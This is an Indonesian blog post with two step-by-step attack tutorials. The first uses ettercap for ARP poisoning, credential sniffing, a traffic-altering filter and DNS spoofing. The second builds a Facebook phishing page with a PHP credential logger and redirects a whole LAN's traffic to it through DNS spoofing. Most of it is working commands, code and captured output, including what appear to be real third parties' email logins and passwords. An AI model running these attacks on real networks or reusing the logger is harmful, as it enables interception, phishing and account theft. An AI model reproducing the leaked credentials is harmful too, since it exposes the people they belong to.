[++++=== Welcome To My Site Me ===++++]
ettercap di backtrack 5
Sebenarnya ini hanyalah update dari postingan saya sebelumnya
.. namun kali ini saya menggunakan Backtrack V dan agak melengkapi
fiture-fiture ettercap. Ettercap biasa di sebut sebagai Swiss Army
Knife, Ettercap sebenarnya merupakan tools yang sering di gunakan untuk
metode penyerangan MITM ( man on the middle attack ). Banyak varian
serangan pada MITM, sebut saja sniffing, spoofing, phissing, cookies
hijacking dan masih banyak lagi. Ok saya deskripsikan percobaan saya.
1. Attacker : backtrack V R1
Ip address :
Link encap:Ethernet HWaddr f4:ec:38:99:60:f3 inet addr:192.168.1.6 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:29319 errors:0 dropped:0 overruns:0 frame:0 TX packets:30177 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:17469869 (17.4 MB) TX bytes:6132389 (6.1 MB)2. Target : windows xp ( terinstall pada virtualbox )
Ip address : 192.169.1.14
3. Gateway : 192.168.1.1 ( tp-link modem route )
4. Accesspoint : 192.168.1.50 ( 3com )
Ok lets begin..
Langkah pertama , biasanya attacker akan mengumpulkan target terlebih dahulu. Kali ini saya gunakan nmap
zee@eichel{~}:nmap -sn -n 192.168.1.1/24 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-06 14:29 WIT Nmap scan report for 192.168.1.1 Host is up (0.0076s latency). MAC Address: C8:64:C7:4B:B8:D0 (zte) Nmap scan report for 192.168.1.6 ===> Attacker Host is up. Nmap scan report for 192.168.1.14 ===> Target Host is up (0.0029s latency). MAC Address: 08:00:27:45:C0:C0 (Cadmus Computer Systems) Nmap scan report for 192.168.1.25 Host is up (0.0095s latency). MAC Address: 1C:4B:D6:44:75:9D (AzureWave) Nmap scan report for 192.168.1.50 Host is up (0.014s latency). MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe) Nmap done: 256 IP addresses (5 hosts up) scanned in 2.35 secondsKita coba melihat hasil man dari ettercap , perbiasakan baca.. dengan membaca kita jadi tahu secara detail
ETTERCAP(8) ETTERCAP(8) NAME ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks ***** IMPORTANT NOTE ****** Since ettercap NG (formerly 0.7.0), all the options have been changed. Even the target specification has been changed. Please read carefully this man page. SYNOPSIS ettercap [OPTIONS] [TARGET1] [TARGET2] TARGET is in the form MAC/IPs/PORTs where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25) DESCRIPTION Ettercap was born as a sniffer for switched LAN (and obviously even "hubbed" ones), but during the development process it has gained more and more features that have changed it to a powerful and flexible tool for man-in-the-middle attacks. It supports active and passive dissec‐ tion of many protocols (even ciphered ones) and includes many features for network and host analysis (such as OS fingerprint). dst...Now what ?
PREPARE :
Jika kita menginginkan serangan sang Swiss Army Knife ini berfungsi dengan baik pada koneksi jaringan aman ssl maka kita harus memastikan bahwa redir_command_on script pada etter.conf aktif. Secara default etter.conf di backtrack linux R1 berada pada direktori
/etc/etter.confUntuk mengaktifkan script tadi , buka file etter.conf dengan editor kesayangan anda kemudian uncomment baris di bawah ini.
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Dump traffic pada ARP ( sniffing – dump cookies https )
Command : ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //Keterangan :
1. Dump traffic dan sniffing 2. Syntax T = mode text w = menulis ke sebuah file , dalam contoh ini adalah "dump" i = Interface secara spesifik ( default = eth0 ) M = Tipe attack ( MITM )hasil output :
zee@eichel{~}:ettercap -T -w dump -i wlan0 -M ARP /192.168.1.1/ // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on wlan0... (Ethernet) wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 5 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.1.1 C8:64:C7:4B:B8:D0 GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help Fri Jan 6 15:04:25 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | SA HTTP : 69.171.224.11:443 -> USER: teconhackers@yahoo.com PASS: testes INFO: http://www.facebook.com/ Fri Jan 6 15:04:25 2012 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P POST /login.php?login_attempt=1 HTTP/1.1. Host: www.facebook.com. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. Accept-Language: id,en-us;q=0.7,en;q=0.3. Accept-Encoding: gzip, deflate. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7. Connection: keep-alive. Referer: http://www.facebook.com/. Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; lu=RAxSgUQ56_3YJisKv_hVcK2w; lsd=5OOOR; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; wd=855x451; act=1325837039360%2F1%3A2; _e_qGyw_0=%5B%22qGyw%22%2C1325837031899%2C%22act%22%2C1325837031895%2C0%2C%22email%22%2C%22click%22%2C%22click%22 %2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C648%2C37%2C0%2C838%2C16%5D; _e_qGyw_1=%5B%22qGyw%22%2C1325837039364%2C%22act%22%2C1325837039360%2C1%2C%22pass%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2 Fri Jan 6 15:04:25 2012 TCP 192.168.1.14:1116 --> 69.171.224.11:443 | P C798%2C39%2C0%2C838%2C16%5D. Content-Type: application/x-www-form-urlencoded. Content-Length: 276. . charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94% 2C%D0%84&lsd=5OOOR&locale=id_ID&email=teconhackers%40yahoo.com&pass=testes& default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C %E6%B0%B4%2C%D0%94%2C%D0%84&lsd=5OOOR&timezone=-270 Fri Jan 6 15:04:31 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P HTTP/1.1 200 OK. Cache-Control: private, no-cache, no-store, must-revalidate. Expires: Sat, 01 Jan 2000 00:00:00 GMT. P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p". Pragma: no-cache. X-Content-Type-Options: nosniff. X-Frame-Options: DENY. Set-Cookie: _e_qGyw_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: _e_qGyw_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: datr=-JSqTtD5bQG1_TZPO4s_w1F0; expires=Sun, 05-Jan-2014 08:04:30 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com. Set-Cookie: sfiu=AYiQWdMg0NKJJtjnR5tVGVvbNWEMxoG_LiLa0edz4Cl1Dat4VE5lNttqg66Y1AHmjG6eSmP3y8c8Q3UlogKtkOItnAr5I2uMzVEZJEd1HSvnRpbJDnULxFRjPYmUQdI5e8H4LJ2OdkxMMsOvFBT6UeBM; expires=Sun, 05-Feb-2012 08:04:30 GMT; path=/; domain=.facebook.com; httponly. Set-Cookie: wd=deleted; expires=Thu, 01-Ja Fri Jan 6 15:04:31 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P n-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly. Content-Encoding: gzip. Content-Type: text/html; charset=utf-8. X-FB-Server: 10.54.101.46. X-Cnection: close. Date: Fri, 06 Jan 2012 08:04:30 GMT. Content-Length: 6549. . ...........\[o.Hv~._..f..n......@.d[.l...n.. JdI.E.4/..k`.,. @.......$...$....... 8.6X......H...nOo;.d0.M....:u.....y^.o6..+.....go.?.I.NA64Y2...&*m.vW.T.x^A.l...Yg J..7=..I...Q. .~;."K..7...... Fri Jan 6 15:04:31 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P .,.7lK.V....Z.k..h......Y.^..K.7..,....../+V.....^...Go.Z.....?..]')..z`H&m..tI.. ....3A..D|. D`.r.....9..LL...8Q...A .N,M.&...6.;. ....0.p....tc.x ..c.....gob....w.-. 192.168.1.14:1116 | P .....YL#...$...lm..+B.:.C...!.Q......n/H .T...".?.kF..>[%e..pH6!.!.`2H.......h.FZ .m.>].|.Y.....3\......G........0.F..e..D......6...(...L.3l .1...|.2,h.Wa.H.*...U. ..6.......'l;..v..v6..=*.(..Fb..aF4.Z......H..,....'yC.....5t.6@u;!......2..+.GD. ...,..3:V..dzp.Q.{.......>.......a.F....L.F.5.v .]..z...86.2.......r....F1.&iB... ...lC.A...X}...m...?..w.5a..Z..P*........1(.....Z...P.=.K. FW6z6F#.&A...g..c.-b....5#d...6%......V` Fri Jan 6 15:04:32 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P ..4../.\.oJ...6TA...Da.2>.............ou..x...c.b.25z(...^.vYcO7.......pL.....NW4 e.v..Z...'..tNz=.......a@.. .. Up.7.".......8X.4)....%.E...YoB....3.+*..H"|..g.0f .C.%.#h..bv....T...Y.[.;.6.......e_.L.X...Pm`j.h94.C_T...I..!@..4p.....Z.......y. w......f...0...r.......-.i.^..c..o..sL.cz...SD.ZxB.q8..S......../...o|........... 7.....D..ar.....=t.D0aT...... '...}h...g.............].cb@.s.f......V?.M.!8....8. .........a*..8:,...O.._........m.y.8.8...B9..p...*.3.w9.1..5..Lu.F.m...x.*.c.N... .gp.....f7i..#....h.;....k..w..[3...T..r...D.t ..i0..X!...,o.^ 192.168.1.14:1116 | P r.p..9=?.\...UMst...l............e.H.y..3.i.. .K.;b..T...Q..|..'H..?.....j{..AKj.-y......P...J....J.......y#..^.hnia=.[.....e.. e,...%.&..R.f....V..4..Ds..}..5(.....?(.f..=.........Z.T......;..\....3.%........n ...rn.}.T9X._...S.X].....;-..\6.'+..|w5.s.[......F.j.h.X).j..[j.~.H..Jo...@.\...O. .\......=G...p3....ll.gr.F . 192.168.1.14:1116 | P I...Q2..v.#.....:.4..wro.....Gh..&B. .C.../.FD...n.xG..!V`.ny..hN....?tD..2.;..h. p........6.ob......^.T.R......=...M.ma.D.s..ui...T4.....D.}..:c............g@].. vW.^X...^...."...h&. ..VZ.0.>.;...mB.....\._.c.........7.".a......_.s|dk.Vp..g.v. .u>."....|.~..T.m..dl.....*.....Xk.....}.t.]..=.....f........#.`w.(5.{..U`.....z. .....0C.....~...}../....}......O~.4....'.Y..U..6.&m..3c:.=.........?.M....'.....d. 3.........s..!. '3.0g..Yv...Z.........\..M...._.....c.....5/......."....W..f.P..7..JC)W..:..a^J.. ...3D..n.G....3 o..'?..Z6@h...p.R............ wtp.........-.f.....T.(.T.y.|.C......\.......;..+..X.H&.....W..V.q"...5.....%.... 9....p.{v....fW}..L...d...G......&..q.)...H....=.C.|..#.v..Zxw.4...CX...$2..?+.h. p6.kH.@ Fri Jan 6 15:04:33 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P .G.j..C...4..p.sY*K..W.R..?..H..!o.D.G....=.Q..6...I:..%... ...)..."&f"}.%..uM... ..r. .s..............X.. ,.9^.u..fe..1.....G.....U].A..?...C../.J..~.... .......!..D...M$~Oq..OF.........- .t.y.H...,...|....... .F..L.t!1..k`.y....`].>KC..`..%.0,DZ2x..Z...#.5.....D.D.C.. .2.y_..c.x2........[.3.U.....1Y. 192.168.1.14:1116 | P k|&.......egL..Hd3.'s/...Y-...Xb.ic.....MR.~4.v#.......b...U6....E.L..7..6q....T. 1....@.....l"s..U...;e.H....*4.....nk...E\..8) $^ q.uqU~-.........E.{....*..|^... Y..s^...A....9.g..^@....v=.~..^.j....e.N.7TG\d.Q.e".{../......4.7 s .o.6........P...z ........C..g.V.&mg...ZJ.....U....3|_I7a........F0bH...[..........B....+.......M.. CD..E.2.......T.hLY....{!.P........C}.............9...I... ...LaeD.j...^...m..... ....m.......S.5.Z.v..r....).Zm.tX:.......5......C.U..w;.buo.Y......|.x.(.0....... ....O...u..wLN*+sjnu~..,.k.]........A.k..l....s...B....4?.2.O%..I....x..c*..}..n. jw.[..nd."........{X.....B"..*..r...3\...".^L.4.......9..j.C.[.....~v.TP.8.z..z.p . 192.168.1.14:1116 | P .{.."..Fn.fX..I|.......7..J....Z.4.*9t6P..j?O7...).O.:..P.|...ep......h.dg.0..NB? .Qb.D...pM..|...(.....{q...(U......$..t..Y&;&(.ne.0..^..8f......#u.:f.N..-...#.;. .....W...c..1.1.....@......9|....M..B.....t.c..Dx.0..=.. .k../c..6.....S..8.!...A ...V6...(4Qb....$...'fl..........2..$A.............3Q...A.c......(.$..(....%z.... ....?$ R.6.i.......,.m.x..,2P.....\....z.|.=...'...c..R,.......;.....Y9'*7.#E.K.. .i Fri Jan 6 15:04:33 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | P .~.4..f...P.[.......5(...f..YAN0...Rqs/Y9......C..mt....6 .......4.9,U.,..U....[*..3.. ...q.'../.....8A==...XM....R.D.h*7._\._.[.K31....Ze.!$..9...g.T...........C.pe.. ...*...G....'..t..c............]QIH.....I..&J.."[.....D}...!.I.........0.wT. V. .&.....sH.....t..]W.!..a..!.;4.?.....s"..,.5 ..b..oiT.R.gE.....u....X(.U..x..._. gT...._...hP....-.....l.....+... h.iu.(.'.......Y.. .](d......Rny%..!%m.6\.y..pQ ... [.m.c*b%..E...D..Z....Kq|.d..i.#*.Y.\....[...9......eU..b.w\......A....`% .&O.K.. ...$....t.iQ .@... 5...g.L..@.G.1.....QP9..|..q .)..O.dY...d._.._OT...G.. Fri Jan 6 15:04:33 2012 TCP 69.171.224.11:443 --> 192.168.1.14:1116 | RPerhatikan hasil output yang saya tandai ..user name : teconhackers@yahoo.com dan pass : testes , serta cookies yang telah di dump.
METODE SERANGAN ARP POISONING + SNIFFING ATTACK
1. Metode serangan secara menyeluruhYang saya maksudkan dengan metode serangan secara menyeluruh adalah serangan yang menuju kepada seluruh host di bawah satu router ( gateway ).
ettercap -T -q -M ARP // //Sangat tidak di sarankan jika target memiliki jaringan yang besar. Akan membuat komposisi komputer lambat. Mungkin dengan spec hardware yang tinggi kita memiliki kemampuan untuk melakukan metode serangan ini.
Spesifikasi syntax -q = quite mode ( verbose )Kombinasi syntax untuk serangan ke seluruh network
ettercap -T -q -M ARP // //Hasil output :
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP // // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on wlan0... (Ethernet) wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 5 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help HTTP : 69.171.228.13:443 -> USER: teconhackers@yahoo.com PASS: testers INFO: https://www.facebook.com/ HTTP : 66.163.169.186:443 -> USER: niceday PASS: 299281 INFO: https://login.yahoo.com/config/login_verify2?&.src=ym2. Metode serangan terhadap satu spesifik IP
Jika jaringan terlalu besar ada baiknya kita menyerang target ip yang di tentukan. Serangan tersebut di mulai dengan syntax
ettercap -T -q -F ig.ef -M ARP /xxx.xxx.xxx.xxx/ //Sebagai contoh kita menyerang ip target 192.168.1.14
hasil output :
zee@eichel{~}:ettercap -T -q -i wlan0 -M ARP /192.168.1.14/ // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on wlan0... (Ethernet) wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 4 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.1.14 08:00:27:45:C0:C0 GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help HTTP : 72.14.203.84:443 -> USER: zee-eichel@gmail.com PASS: uufjjeiisjau INFO: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1<mpl=default<mplcache=2
Filter ( have fun with ettercap )
Heheh sekarang kita coba bermain-main dengan ettercap ini dengan menggunakan filter-filter tertentu. Kali ini kita coba filter yang di coding oleh irongeekBerikut ini scriptnya , copas kemudian simpan dengan nama ig.filter kemudian copile script tersebut dengan ettercap
############################################################################ # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & NaGA # # Along with some help from Kev and jon.dmml # # http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" "); replace("IMG SRC=", "http://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-snc7/310716_228831213842949_100001482164189_675549_1767862890_n.jpg\" "); msg("Filter Ran.\n"); } Compiling : etterfilter [name].filter -o [output].ef zee@eichel{~}:etterfilter ig.filter -o ig.ef etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file 'ig.filter' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'ig.ef' done. -> Script encoded into 16 instructions.Penjelasan pada script filter tadi sebenarnya hanya mengganti seluruh gambar yang di buka pada browser korban dengan gambar yang di kehendaki. Untuk menjalankan ettercap dengan script filter tertentu ,
ettercap -T -q -F ig.ef -M ARP // //Jika muncul barisan
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Berarti proses ARP Poisoning sedang berjalan dan berbagai image akan di ganti dengan image yang ditentukan, sehingga tiap kali host target atau jaringan yang telah di racuni akan melihat setiap image yang telah di ganti tersebut pada setiap website yang di bukanya pada browser.
Spoofing Plugin
Spoofing adalah salah satu tehnik MITM yang mengalihkan traffik dari jalur sebenarnya menuju kepada alamat yang di tentukan. Intinya Attacker akan memaksa target menuju pada alamat yang ditentukan attacker menggantikan alamat sebenarnya yang dituju target.Ettercap memiliki plugin untuk melakukan jenis serangan MITM ini.
Lakukan nmap scanning seperti yang sudah saya contohkan di awal artikel ini. Setelah kita telah mendapatkan informasi network pastikan kita mengaktifkan ip forwarding pada mesin attacker.
Untuk mengaktifkan ip forwarding
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forwardBSD:
sysctl -w net.inet.ip.forwarding=1Kemudian config jalur yang akan di spoof nantinya yang di konfigurasikan pada file etter.dns. Lokasi file etter.dns secara default pada backtrack V R1
/usr/local/share/ettercap/etter.dnsUncommand atau ganti baris ini dengan domain yang hendak di spoof ipnya.
facebook.com A 192.168.1.6 *.facebook.com A 192.168.1.6 www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are not allowedEdit ip address dengan ip address pengganti , dalam hal ini saya menggunakan ip address yang di gunakan os backtrack yaitu 192.168.1.6, dan hasilnya akan mengarahkan domain facebook.com dan www.facebook.com ke ip address 192.168.1.6
Syntax ettercap dengan plugin dns_spoof
ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //-P = plugin
saya coba spoof ke gmail.com dengan ip 192.168.1.6
Hasil Output :
Hasil ping pada target host
Perhatikan hasil ping pada host target, ternyata domain www.gmail.com telah di arahkan ( spoofed ) ke 192.168.1.6 Berhubung saya mengaktifkan apache web server ( localhost server ) maka ketika host target membuka gmail.com melalui browser , browser akan membuka halaman localweb saya yang terdapat pada alamat 192.168.1.6
Ok semoga postingan saya ini berguna .. artikel ini akan saya update selanjutnya , kali ini akan saya tambahkan cara menanggal serangan-serangan seperti ini.
Source : Om Zee
Diposting oleh ethical code di 20.03 0 komentar
Phissing attack di kombinasikan dengan Spoofing Attack
Phissing
atau dikenal di kalangan umum sebagai fakelogin sebenarnya adalah suatu
tehnik dalam man on the middle attack. Dengan memanfaatkan human error
atau kelalaian internet user , maka phissing merupakan salah satu metode
serangan yang tidak dapat di anggap enteng.
Phissing sendiri menurut saya merupakan aksi penipuan dengan
memanfaatkan fakelogin atau halaman palsu dari suatu situs tertentu yang
memiliki halaman login atau memerlukan autentifikasi user untuk
menggunakan aplikasi web tersebut. Biasanya Phissher mengincar
website-website jejaring social , email , dan situs internet banking.
Tujuan para attacker tersebutnya sebenarnya hanya untuk mendapat
username serta password dari pengguna situs-situs penting di atas yang
di gunakan untuk kepentingan sendiri.
Ok ,langsung saja kali ini saya akan membuka tabir salah satu metode
klasik phissing attack yang memang masih sangat work atau bisa di
katakan masih berhasil di lakukan baik lewat metode NAT maupun LAN.
1. Menyiapkan fakelogin
Untuk contoh kali ini , saya akan menggunakan situs jejaring sosial paling populer saat artikel ini ditulis, saya memilih facebook.com sebagai target spoofing kali ini.Untuk membuat fakelogin facebook , maka kita hanya tinggal membuka facebook.com kemudian kita save page indexnya dengan control kanan lalu pilih save as
Save dengan nama index.html dan save di direktori localhost atau webserver lokal anda. Karena saya menggunakan backtrack maka saya menyimpannya di direktori /var/www
Kemudian edit file index.html tadi dengan editor text anda kali ini saya gunakan gedit
Cari dengan fasilitas search ( cntrl+f ) kata action kemudian rubah isinya dengan “post.php”
action="https://www.facebook.com/login.php?login_attempt=1"
Rubah jadi
action="post.php"
Kemudian siapkan file post.php dengan source code di bawah ini , simpan dengan nama post.php dalam direktori yang sama dengan index.html.
<!--?php
$file = "zeeganteng.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "// ";
?>
Perhatikan nilai pada variable $file. Disanalah script tersebut akan menyimpan hasil input pada form login dan form password. karena itu kita harus membuat sebuah file kosong zeeganteng.txt kemudian simpan pada direktori yang sama.
Bagi pengguna linux , jangan lupa untuk mengatur chmod 777 ke seluruh file agar dapat di esekusi oleh “other”
zee@eichel{/var}:chown 777 www -R zee@eichel{/var}:ls -l www total 52 drwxrwxrwx 3 777 527 4096 2012-01-06 21:23 ./ drwxr-xr-x 18 root root 4096 2011-11-03 18:50 ../ drwx------ 2 777 root 4096 2012-01-06 20:56 index_files/ -rw-r--r-- 1 777 root 34008 2012-01-06 21:16 index.html -rw-r--r-- 1 777 root 0 2012-01-06 21:21 zeeganteng.txt -rw-r--r-- 1 777 root 911 2012-01-06 21:21 post.phpSaya melakukan testing .. ke http://127.0.0.1/
2. Spoofing Attack
Setelah kita berhasil membuat fakelogin tadi , saatnya kita melakukan serangan spoofing agar korban tidak harus menulis ip address kita untuk mencapai fakelogin yang telah kita persiapkan pada direktori localhost kita. Dalam kasus ini saya memiliki ip address 192.168.1.6 maka saya melakukan spoof attack dari domain facebook.com dan mengarah kepada ip address saya. Untuk melakukan itu silahkan teman-teman membaca artikel saya sebelumnya mengenai ettercap dan dns spoofing pada alamat di bawah ini.http://zeestuff.wordpress.com/2012/01/06/ettercap-di-backtrack-v/
zee@eichel{/var}:ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0… (Ethernet)
wlan0 -> F4:EC:38:99:60:F3 192.168.1.6 255.255.255.0
Privileges dropped to UID 0 GID 0…
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %
9 hosts added to the hosts list…
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…
Text only Interface activated…
Hit ‘h’ for inline help
Activating dns_spoof plugin…
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api-read.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-ie-w.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pixel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [id-id.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 74.125.157.109:993 -> USER: cassa.prodigy@gmail.com PASS: m1rw4nju4n22091985
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [m.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [graph.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [api.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [s-static.ak.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [touch.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-244.channel.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [0-310.channel.facebook.com] spoofed to [192.168.1.6]
IMAP : 173.194.66.109:993 -> USER: cassa.prodigy@gmail.com PASS: m0twhnju4n22ees1985
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [apps.facebook.com] spoofed to [192.168.1.6]
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
DHCP: [F4:EC:38:99:60:F3] REQUEST 192.168.1.6
